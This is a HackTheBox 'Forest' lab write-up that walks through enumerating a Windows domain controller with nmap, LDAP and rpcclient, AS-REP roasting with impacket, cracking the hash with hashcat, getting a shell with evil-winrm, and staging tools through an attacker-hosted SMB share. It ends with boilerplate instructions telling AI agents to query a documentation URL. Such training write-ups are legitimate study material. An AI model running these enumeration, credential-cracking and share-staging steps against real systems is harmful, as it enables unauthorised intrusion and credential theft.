# HackTheBox - Forest

![Easy Windows Machine by HTB](/files/-MXuTGWWKo8C0tAXn-sh)

Let's start off with a simple nmap scan for open ports and services. 

```
nmap -sC -sV -oA nmap-forest 10.10.10.161
```

![nmap scan results](/files/-MXuWZ7gYafml8Zzbkg0)

We will keep a Nmap all port scan running in the background and start enumerating with what we have.

```
nmap -A -p- -T4 -oA nmap-forest-all-port-scan 10.10.10.161
```

### Enumerating Samba

Incase you don't have smbclient installed on the system.

```
apt-get install smbclient && apt-get install smbmap
```

![](/files/-MXuYNDD_Ud1f0RlWWOh)

No shares found on Anonymous login.

### Enumerating LDAP

```
apt-get install ldap-utils
```

![](/files/-MXu_2fOHqZyG0VdddlS)

Using query to get results for `'objectClass=Person'`

![](/files/-MXualzzQqgY4W8JQgjr)

We get a ton of data to look after. Query to get all the users present on the machine.

```
ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local" 'objectClass=Person' sAMAccountName | grep sAMAccountName | awk '{print $2}' > ldap-users.txt
```

![](/files/-MXuc9qfWn8t0mRwj8e_)

Creating Custom Passwords using bash knowledge. We will add various common passwords like Autumn, Spring, Password, etc.

```
for i in $(cat pwlist.txt);do echo $i; echo ${i}2019; echo ${i}2020; done
```

Also we will be using hashcat and it's best64 rule to create a unique and promising wordlist.

```
hashcat.exe --force --stdout -r best64.rule pwlist.txt
```

### Scanning with crackmapexec (Pass-Policy Check)

![](/files/-MXv0-Eu-TueTU6q5wJO)

We can also use rpcclient to enumerate bunch of users and their info. 

```
rpcclient -U '' -N 10.10.10.161
```

![](/files/-MXv1A7eNBqdKDrZxtZQ)

We can use a lot of query options available to enumerate any user. Actually we got a new user named `svc-alfresco`

![](/files/-MXv2WH18FHCGM0LMV1w)

![](/files/-MXv2xqGLLtOQXhuN9du)

As  `PasswordLockoutThreshold` is set to None, we can try bruteforcing the users present.

### Getting Shell Access

We will use GetNPUsers.py script by impacket. This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF\_DONT\_REQUIRE\_PREAUTH).

This script is useful for abusing Kerberos against AS-REP Roasting attack.

![](/files/-MXv7SvCRFx77i-_kFDo)

Make sure to convert the hash into (hashcat) format.

![](/files/-MXv7ZZFGU95RjHfjmGG)

So the password can be cracked using hashcat and rockyou.txt wordlist.

![](/files/-MXv8-w6w7sviPjWUvYJ)

![](/files/-MXv8OwdbmjSOnV5E2ug)

We have read access to `NETLOGON` and `SYSVOL` shares.

Here, we can use evil-winrm to get shell on the box as we already have username and password for svc-alfresco service account.

![](/files/-MXv9WCu19GrMTuVF9Dw)

user.txt is presen t in C:\Users\svc-alfresco\Desktop.

### Setting Up SMBShare using impacket and using New-PSDrive to mount the share.

First we need to setup a server using smbserver.py from the impacket module.

```
python3 /opt/impacket/examples/smbserver.py PleaseWork $(pwd) -smb2support -username $USER -password $PASS
```

![](/files/-MXvRn7i1rOoWeGL5v63)

We need to transfer winPeas.exe into the target machine for Machine Enumeration. So we will transfer it using SMB Share. First keep the file (winPeas.exe) in the share directory and start off the server.

In order to create a PSDrive (Mount share), we need a create a password credential object. 

**Creating password/credential object:** 

```
$pass = convertto-securestring 'injoker@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('akshay',$pass)
New-PSDrive -Name akshay -PSProvider FileSystem -Credential $cred -Root \\10.10.14.2\PleaseWork

```

![](/files/-MXvUg-CEEBrm4ziHvGF)

We can browse the share and can even run the files present in that share as we have successfully authenticated ourself.

![](/files/-MXvVCn0uFCKj2TLPrGS)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://akshaydeepakshinde.gitbook.io/hackthebox-windows/master.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.